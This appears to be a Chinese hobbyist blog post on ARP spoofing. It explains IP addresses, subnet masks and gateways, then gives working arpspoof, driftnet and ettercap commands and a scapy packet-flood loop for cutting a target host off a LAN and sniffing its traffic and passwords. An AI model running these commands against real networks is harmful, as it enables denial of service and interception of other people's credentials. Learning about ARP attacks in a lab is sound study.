ARP攻击

折腾了大半天,最后也只是了解了arp攻击一些最基础的语句,可扫描当前局域网下连接的ip地址,对指定的ip断网,局限性很高,需要在内网,仅限日常娱乐,一些监听之类的操作还需要补知识(菜是原罪)。

ARP欺骗原理

其主要原理是局域网内的”攻击机”通过冒充同网络号下的”受害者主机”的物理地址(mac地址),通过欺骗网关,让网关原来应该发给“受害者主机”的数据包转而发给“攻击机”,这就导致了“受害者主机”无法收到应答的数据包,也就等于断网了。本实验的过程也就是常说的 ARP欺骗。

IP地址,子网掩码,网关定义

IP地址

IP地址:为了使连入Internet的众多电脑主机在通信时能够相互识别,Internet中的每一台主机都分配有一个唯一的32位地址,该地址称为IP地址,也称作网际地址。IP地址由4个数组成,每个数可取值0~255。

子网掩码

子网掩码只有一个作用,就是将某个IP地址划分成网络地址和主机地址两部分。 子网掩码的设定必须遵循一定的规则。与IP地址相同,子网掩码的长度也是32位,左边是网络位,用二进制数字“1”表示;右边是主机位,用二进制数字“0”表示。例如IP地址为“192.168.1.1”和子网掩码为“255.255.255.0”。其中,“1”有24个,代表与此相对应的IP地址左边24位是网络号;“0”有8个,代表与此相对应的IP地址右边8位是主机号。这样,子网掩码就确定了一个IP地址的32位二进制数字中哪些是网络号、哪些是主机号。

网关

大家都知道,从一个房间走到另一个房间,必然要经过一扇门。同样,从一个网络向另一个网络发送信息,也必须经过一道“关口”,这道关口就是网关。顾名思义,网关(Gateway)就是一个网络连接到另一个网络的“关口”。同一局域网下的网关相同。

arpspoof

大家好,我是练习时长两小时半的个人练习生,喜欢唱、跳、arp,突发奇想想学一下rap,研究了大半天发现工具基本上用不了,arpattacker的自动攻击频率太低,所以只能自己写包(dbp,不会自己写,菜哭),之后尝试了下Windows的arpspoof简单软件,可以实现对手机ip的断网操作,但是电脑无法断开,在linux上安装了arpspoof,安装和虚拟机的网络上遇到了一些问题,下面记录一下问题的解决方法。

安装arpspoof

apt-get install dsniff ssldump

虚拟机网络问题

需要使用桥接模式,直接连接物理网络,在NAT模式中,执行攻击命令时会报错

libnet_open_link(): UID/EUID 0 or capability CAP_NET_RAW required

NAT模式会共享主机的ip地址。

查询和攻击命令

查询本机网卡和ip地址

ifconfig

查询网关

route -n

查询连接在局域网的ip地址

fping -asg 192.168.1.0/24
fping -asg 网口.0/24
nmap -sP 192.168.1.0/24
nmap -sP 网口.0/24

攻击命令

sudo -s arpspoof -i ens33 -t 192.168.1.102 192.168.1.1
sudo -s arpspoof -i 网卡 -t 攻击ip  网关

arp欺骗

IP转发:

echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward

图片捕获:(流量转发后网页浏览很卡,很多图片和网站打不开,体验极差

driftnet -i ens33

抓取账号密码:(好像已经没用了,试了几个网站都抓不到

ettercap -Tq -i eth0

scapy

Linux下实现arp攻击scapy是一个很好的工具,还是先从断网开始,

p = Ether()/ARP()//构造一个包
p.hwdst = 'b4:6d:83:88:24:08' //要攻击的主机mac地址
p.pdst = '192.168.1.108'  //要攻击的主机的ip
p.psrc = '192.168.1.1'   //网关ip
p.hwsrc = 'aa:aa:aa:aa:aa:aa'  //随便写个mac地址
while 1: sendp(p,inter=0.005,count=9999)//无限发送,按Ctrl+z停止发送

csdn上的一篇文章,原文链接:https://blog.csdn.net/qq_35315699/article/details/73863632

之后再学一下怎么用python写包(咕~,话说有内网我是不是可以直接用wireshark????

0%